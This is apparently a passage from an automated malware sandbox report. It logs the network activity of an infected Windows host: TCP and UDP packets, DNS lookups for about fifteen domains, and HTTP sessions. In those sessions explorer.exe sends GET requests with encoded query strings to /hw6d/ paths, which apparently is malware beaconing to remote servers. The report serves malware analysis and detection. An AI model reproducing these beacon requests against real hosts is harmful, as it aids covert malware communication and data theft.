                                                                            Apr 8, 2021 12:38:24.397468090 CEST4974280192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:38:24.397500038 CEST4974280192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:38:24.410653114 CEST804974234.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:38:34.576863050 CEST4975580192.168.2.4192.187.111.219
                                                                            Apr 8, 2021 12:38:34.700118065 CEST8049755192.187.111.219192.168.2.4
                                                                            Apr 8, 2021 12:38:34.700261116 CEST4975580192.168.2.4192.187.111.219
                                                                            Apr 8, 2021 12:38:34.700460911 CEST4975580192.168.2.4192.187.111.219
                                                                            Apr 8, 2021 12:38:34.823761940 CEST8049755192.187.111.219192.168.2.4
                                                                            Apr 8, 2021 12:38:34.838860035 CEST8049755192.187.111.219192.168.2.4
                                                                            Apr 8, 2021 12:38:34.838900089 CEST8049755192.187.111.219192.168.2.4
                                                                            Apr 8, 2021 12:38:34.839039087 CEST4975580192.168.2.4192.187.111.219
                                                                            Apr 8, 2021 12:38:34.839102983 CEST4975580192.168.2.4192.187.111.219
                                                                            Apr 8, 2021 12:38:34.962363005 CEST8049755192.187.111.219192.168.2.4
                                                                            Apr 8, 2021 12:38:39.914177895 CEST4975680192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:38:39.926671028 CEST804975634.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:38:39.929672003 CEST4975680192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:38:39.930010080 CEST4975680192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:38:39.942357063 CEST804975634.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:38:40.043973923 CEST804975634.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:38:40.043994904 CEST804975634.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:38:40.044217110 CEST4975680192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:38:40.044251919 CEST4975680192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:38:40.056862116 CEST804975634.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:38:50.210047960 CEST4976280192.168.2.435.246.6.109
                                                                            Apr 8, 2021 12:38:50.240947962 CEST804976235.246.6.109192.168.2.4
                                                                            Apr 8, 2021 12:38:50.241103888 CEST4976280192.168.2.435.246.6.109
                                                                            Apr 8, 2021 12:38:50.241262913 CEST4976280192.168.2.435.246.6.109
                                                                            Apr 8, 2021 12:38:50.271555901 CEST804976235.246.6.109192.168.2.4
                                                                            Apr 8, 2021 12:38:50.309286118 CEST804976235.246.6.109192.168.2.4
                                                                            Apr 8, 2021 12:38:50.309360981 CEST804976235.246.6.109192.168.2.4
                                                                            Apr 8, 2021 12:38:50.309541941 CEST4976280192.168.2.435.246.6.109
                                                                            Apr 8, 2021 12:38:50.309573889 CEST4976280192.168.2.435.246.6.109
                                                                            Apr 8, 2021 12:38:50.339886904 CEST804976235.246.6.109192.168.2.4
                                                                            Apr 8, 2021 12:38:55.551151037 CEST4976380192.168.2.452.128.23.153
                                                                            Apr 8, 2021 12:38:55.586055994 CEST804976352.128.23.153192.168.2.4
                                                                            Apr 8, 2021 12:38:55.586220980 CEST4976380192.168.2.452.128.23.153
                                                                            Apr 8, 2021 12:38:55.586497068 CEST4976380192.168.2.452.128.23.153
                                                                            Apr 8, 2021 12:38:55.621377945 CEST804976352.128.23.153192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621433973 CEST804976352.128.23.153192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621483088 CEST804976352.128.23.153192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621500015 CEST804976352.128.23.153192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621515036 CEST804976352.128.23.153192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621534109 CEST804976352.128.23.153192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621668100 CEST4976380192.168.2.452.128.23.153
                                                                            Apr 8, 2021 12:38:55.621711016 CEST4976380192.168.2.452.128.23.153
                                                                            Apr 8, 2021 12:38:55.621711016 CEST804976352.128.23.153192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621767998 CEST4976380192.168.2.452.128.23.153
                                                                            Apr 8, 2021 12:38:55.621783018 CEST804976352.128.23.153192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621831894 CEST4976380192.168.2.452.128.23.153
                                                                            Apr 8, 2021 12:38:55.621857882 CEST804976352.128.23.153192.168.2.4
                                                                            Apr 8, 2021 12:38:55.621900082 CEST4976380192.168.2.452.128.23.153
                                                                            Apr 8, 2021 12:39:00.696053028 CEST4976480192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:39:00.708359003 CEST804976434.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:39:00.708455086 CEST4976480192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:39:00.714993954 CEST4976480192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:39:00.727948904 CEST804976434.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:39:00.894391060 CEST804976434.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:39:00.894444942 CEST804976434.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:39:00.894572020 CEST4976480192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:39:00.894665003 CEST4976480192.168.2.434.102.136.180
                                                                            Apr 8, 2021 12:39:00.907676935 CEST804976434.102.136.180192.168.2.4
                                                                            Apr 8, 2021 12:39:11.041254044 CEST4976580192.168.2.481.169.145.150
                                                                            Apr 8, 2021 12:39:11.062413931 CEST804976581.169.145.150192.168.2.4
                                                                            Apr 8, 2021 12:39:11.062693119 CEST4976580192.168.2.481.169.145.150
                                                                            Apr 8, 2021 12:39:11.062895060 CEST4976580192.168.2.481.169.145.150
                                                                            Apr 8, 2021 12:39:11.082779884 CEST804976581.169.145.150192.168.2.4
                                                                            Apr 8, 2021 12:39:11.085100889 CEST804976581.169.145.150192.168.2.4
                                                                            Apr 8, 2021 12:39:11.085124016 CEST804976581.169.145.150192.168.2.4
                                                                            Apr 8, 2021 12:39:11.085372925 CEST4976580192.168.2.481.169.145.150
                                                                            Apr 8, 2021 12:39:11.085458040 CEST4976580192.168.2.481.169.145.150
                                                                            Apr 8, 2021 12:39:11.106547117 CEST804976581.169.145.150192.168.2.4
                                                                            Apr 8, 2021 12:39:16.161201000 CEST4976880192.168.2.4198.54.117.218
                                                                            Apr 8, 2021 12:39:16.335577965 CEST8049768198.54.117.218192.168.2.4
                                                                            Apr 8, 2021 12:39:16.335829020 CEST4976880192.168.2.4198.54.117.218
                                                                            Apr 8, 2021 12:39:16.335943937 CEST4976880192.168.2.4198.54.117.218
                                                                            Apr 8, 2021 12:39:16.510284901 CEST8049768198.54.117.218192.168.2.4
                                                                            Apr 8, 2021 12:39:16.510302067 CEST8049768198.54.117.218192.168.2.4
                                                                            Apr 8, 2021 12:39:27.189635992 CEST4976980192.168.2.4107.178.109.19
                                                                            Apr 8, 2021 12:39:27.346533060 CEST8049769107.178.109.19192.168.2.4
                                                                            Apr 8, 2021 12:39:27.346679926 CEST4976980192.168.2.4107.178.109.19
                                                                            Apr 8, 2021 12:39:27.346791029 CEST4976980192.168.2.4107.178.109.19
                                                                            Apr 8, 2021 12:39:27.503705978 CEST8049769107.178.109.19192.168.2.4
                                                                            Apr 8, 2021 12:39:27.504084110 CEST8049769107.178.109.19192.168.2.4
                                                                            Apr 8, 2021 12:39:27.504101038 CEST8049769107.178.109.19192.168.2.4
                                                                            Apr 8, 2021 12:39:27.504113913 CEST8049769107.178.109.19192.168.2.4
                                                                            Apr 8, 2021 12:39:27.504339933 CEST4976980192.168.2.4107.178.109.19
                                                                            Apr 8, 2021 12:39:27.504389048 CEST4976980192.168.2.4107.178.109.19
                                                                            Apr 8, 2021 12:39:27.504457951 CEST4976980192.168.2.4107.178.109.19
                                                                            Apr 8, 2021 12:39:27.661621094 CEST8049769107.178.109.19192.168.2.4
                                                                            Apr 8, 2021 12:39:32.648036003 CEST4977080192.168.2.435.208.69.149
                                                                            Apr 8, 2021 12:39:32.784075022 CEST804977035.208.69.149192.168.2.4
                                                                            Apr 8, 2021 12:39:32.784219027 CEST4977080192.168.2.435.208.69.149
                                                                            Apr 8, 2021 12:39:32.784507990 CEST4977080192.168.2.435.208.69.149

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 8, 2021 12:37:27.507100105 CEST5372353192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:27.519745111 CEST53537238.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:27.784338951 CEST6464653192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:27.796869993 CEST53646468.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:28.581459999 CEST6529853192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:28.593924999 CEST53652988.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:29.657860994 CEST5912353192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:29.670641899 CEST53591238.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:29.981204033 CEST5453153192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:29.999485970 CEST53545318.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:30.418566942 CEST4971453192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:30.431118965 CEST53497148.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:31.357263088 CEST5802853192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:31.369991064 CEST53580288.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:35.394422054 CEST5309753192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:35.407789946 CEST53530978.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:36.219094992 CEST4925753192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:36.232076883 CEST53492578.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:37.390362024 CEST6238953192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:37.403179884 CEST53623898.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:38.699428082 CEST4991053192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:38.712059021 CEST53499108.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:40.352055073 CEST5585453192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:40.363943100 CEST53558548.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:41.061625004 CEST6454953192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:41.074143887 CEST53645498.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:42.988286972 CEST6315353192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:43.001677036 CEST53631538.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:43.792480946 CEST5299153192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:43.804896116 CEST53529918.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:44.746792078 CEST5370053192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:44.758867979 CEST53537008.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:45.413192987 CEST5172653192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:45.425949097 CEST53517268.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:57.050118923 CEST5679453192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:57.063385010 CEST53567948.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:37:58.822794914 CEST5653453192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:37:58.836508989 CEST53565348.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:00.244445086 CEST5662753192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:00.257817030 CEST53566278.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:02.963752985 CEST5662153192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:02.976217031 CEST53566218.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:13.688766956 CEST6311653192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:13.707421064 CEST53631168.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:17.025027990 CEST6407853192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:17.037996054 CEST53640788.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:17.884820938 CEST6480153192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:17.897609949 CEST53648018.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:24.219710112 CEST6172153192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:24.261137009 CEST53617218.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:27.240782022 CEST5125553192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:27.258912086 CEST53512558.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:28.464804888 CEST6152253192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:28.598004103 CEST53615228.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:29.261529922 CEST5233753192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:29.275113106 CEST53523378.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:29.680192947 CEST5504653192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:29.785809994 CEST53550468.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:30.074496984 CEST4961253192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:30.344984055 CEST53496128.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:30.691864014 CEST4928553192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:30.718132973 CEST53492858.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:30.814646959 CEST5060153192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:30.940912962 CEST53506018.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:31.370680094 CEST6087553192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:31.383594990 CEST53608758.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:31.769354105 CEST5644853192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:31.782504082 CEST53564488.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:32.417454004 CEST5917253192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:32.429963112 CEST53591728.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:33.160809040 CEST6242053192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:33.173552990 CEST53624208.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:33.515496969 CEST6057953192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:33.528354883 CEST53605798.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:34.427864075 CEST5018353192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:34.574769020 CEST53501838.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:39.878290892 CEST6153153192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:39.912935972 CEST53615318.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:41.941878080 CEST4922853192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:41.960880995 CEST53492288.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:45.074912071 CEST5979453192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:45.128465891 CEST53597948.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:50.151755095 CEST5591653192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:50.188862085 CEST53559168.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:38:55.348973036 CEST5275253192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:38:55.548890114 CEST53527528.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:39:00.637727022 CEST6054253192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:39:00.677958965 CEST53605428.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:39:05.919821978 CEST6068953192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:39:05.954108000 CEST53606898.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:39:10.996496916 CEST6420653192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:39:11.039007902 CEST53642068.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:39:12.699774027 CEST5090453192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:39:12.713465929 CEST53509048.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:39:14.408883095 CEST5752553192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:39:14.435889006 CEST53575258.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:39:16.103792906 CEST5381453192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:39:16.159928083 CEST53538148.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:39:21.527534962 CEST5341853192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:39:21.969950914 CEST53534188.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:39:27.009428978 CEST6283353192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:39:27.187257051 CEST53628338.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:39:32.518502951 CEST5926053192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:39:32.646044970 CEST53592608.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:39:37.936652899 CEST4994453192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:39:37.961947918 CEST53499448.8.8.8192.168.2.4
                                                                            Apr 8, 2021 12:39:43.667807102 CEST6330053192.168.2.48.8.8.8
                                                                            Apr 8, 2021 12:39:43.992666960 CEST53633008.8.8.8192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Apr 8, 2021 12:38:24.219710112 CEST192.168.2.48.8.8.80xf805Standard query (0)www.allwest-originals.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:38:34.427864075 CEST192.168.2.48.8.8.80x8b69Standard query (0)www.kathyscrabhouse.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:38:39.878290892 CEST192.168.2.48.8.8.80xf788Standard query (0)www.ladybugtubs.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:38:45.074912071 CEST192.168.2.48.8.8.80xf5d9Standard query (0)www.wellalytics.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:38:50.151755095 CEST192.168.2.48.8.8.80xc049Standard query (0)www.organicfarmteam.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:38:55.348973036 CEST192.168.2.48.8.8.80x1968Standard query (0)www.neutrasystems.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:00.637727022 CEST192.168.2.48.8.8.80x2cb9Standard query (0)www.specstrii.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:05.919821978 CEST192.168.2.48.8.8.80x4741Standard query (0)www.loanascustomboutique.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:10.996496916 CEST192.168.2.48.8.8.80x412aStandard query (0)www.boulderhalle-hamburg.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:16.103792906 CEST192.168.2.48.8.8.80x636cStandard query (0)www.thenewyorker.computerA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:21.527534962 CEST192.168.2.48.8.8.80x4a1fStandard query (0)www.themusasoficial.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:27.009428978 CEST192.168.2.48.8.8.80x7941Standard query (0)www.osaka-computer.netA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:32.518502951 CEST192.168.2.48.8.8.80xb4f3Standard query (0)www.werealestatephotography.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:37.936652899 CEST192.168.2.48.8.8.80x50c1Standard query (0)www.dfch18.comA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:43.667807102 CEST192.168.2.48.8.8.80xf0f4Standard query (0)www.carsoncredittx.comA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Apr 8, 2021 12:38:24.261137009 CEST8.8.8.8192.168.2.40xf805No error (0)www.allwest-originals.comallwest-originals.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:38:24.261137009 CEST8.8.8.8192.168.2.40xf805No error (0)allwest-originals.com34.102.136.180A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:38:34.574769020 CEST8.8.8.8192.168.2.40x8b69No error (0)www.kathyscrabhouse.com192.187.111.219A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:38:39.912935972 CEST8.8.8.8192.168.2.40xf788No error (0)www.ladybugtubs.comladybugtubs.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:38:39.912935972 CEST8.8.8.8192.168.2.40xf788No error (0)ladybugtubs.com34.102.136.180A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:38:45.128465891 CEST8.8.8.8192.168.2.40xf5d9Name error (3)www.wellalytics.comnonenoneA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:38:50.188862085 CEST8.8.8.8192.168.2.40xc049No error (0)www.organicfarmteam.comwww44.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:38:50.188862085 CEST8.8.8.8192.168.2.40xc049No error (0)www44.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:38:50.188862085 CEST8.8.8.8192.168.2.40xc049No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:38:50.188862085 CEST8.8.8.8192.168.2.40xc049No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:38:50.188862085 CEST8.8.8.8192.168.2.40xc049No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:38:55.548890114 CEST8.8.8.8192.168.2.40x1968No error (0)www.neutrasystems.com52.128.23.153A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:00.677958965 CEST8.8.8.8192.168.2.40x2cb9No error (0)www.specstrii.comspecstrii.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:39:00.677958965 CEST8.8.8.8192.168.2.40x2cb9No error (0)specstrii.com34.102.136.180A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:05.954108000 CEST8.8.8.8192.168.2.40x4741Name error (3)www.loanascustomboutique.comnonenoneA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:11.039007902 CEST8.8.8.8192.168.2.40x412aNo error (0)www.boulderhalle-hamburg.comboulderhalle-hamburg.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:39:11.039007902 CEST8.8.8.8192.168.2.40x412aNo error (0)boulderhalle-hamburg.com81.169.145.150A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:16.159928083 CEST8.8.8.8192.168.2.40x636cNo error (0)www.thenewyorker.computerparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:39:16.159928083 CEST8.8.8.8192.168.2.40x636cNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:16.159928083 CEST8.8.8.8192.168.2.40x636cNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:16.159928083 CEST8.8.8.8192.168.2.40x636cNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:16.159928083 CEST8.8.8.8192.168.2.40x636cNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:16.159928083 CEST8.8.8.8192.168.2.40x636cNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:16.159928083 CEST8.8.8.8192.168.2.40x636cNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:16.159928083 CEST8.8.8.8192.168.2.40x636cNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:21.969950914 CEST8.8.8.8192.168.2.40x4a1fServer failure (2)www.themusasoficial.comnonenoneA (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:27.187257051 CEST8.8.8.8192.168.2.40x7941No error (0)www.osaka-computer.netosaka-computer.netCNAME (Canonical name)IN (0x0001)
                                                                            Apr 8, 2021 12:39:27.187257051 CEST8.8.8.8192.168.2.40x7941No error (0)osaka-computer.net107.178.109.19A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:32.646044970 CEST8.8.8.8192.168.2.40xb4f3No error (0)www.werealestatephotography.com35.208.69.149A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:37.961947918 CEST8.8.8.8192.168.2.40x50c1No error (0)www.dfch18.com156.241.53.253A (IP address)IN (0x0001)
                                                                            Apr 8, 2021 12:39:43.992666960 CEST8.8.8.8192.168.2.40xf0f4No error (0)www.carsoncredittx.com192.155.168.82A (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • www.allwest-originals.com
                                                                            • www.kathyscrabhouse.com
                                                                            • www.ladybugtubs.com
                                                                            • www.organicfarmteam.com
                                                                            • www.neutrasystems.com
                                                                            • www.specstrii.com
                                                                            • www.boulderhalle-hamburg.com
                                                                            • www.thenewyorker.computer
                                                                            • www.osaka-computer.net
                                                                            • www.werealestatephotography.com
                                                                            • www.dfch18.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.44974234.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:38:24.281748056 CEST1620OUTGET /hw6d/?DnbLu=9ueW5jgNjqHYG2FKt2LGoCq6SuP7mnM61J0YxzvwfvA6U9wxZN+9uCYbtAS/FF4JJope&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.allwest-originals.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:38:24.397243977 CEST1620INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Thu, 08 Apr 2021 10:38:24 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "606abe3b-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.449755192.187.111.21980C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:38:34.700460911 CEST2558OUTGET /hw6d/?DnbLu=g+1Vjsk4w8x2RD/Kt8Hxup0r2HreN3Gf6VbT6qUlKeSViUJ1r397pmudv9cb4ekjB+95&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.kathyscrabhouse.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:38:34.838860035 CEST2559INHTTP/1.1 302 Found
                                                                            cache-control: max-age=0, private, must-revalidate
                                                                            connection: close
                                                                            content-length: 11
                                                                            date: Thu, 08 Apr 2021 10:38:34 GMT
                                                                            location: http://survey-smiles.com
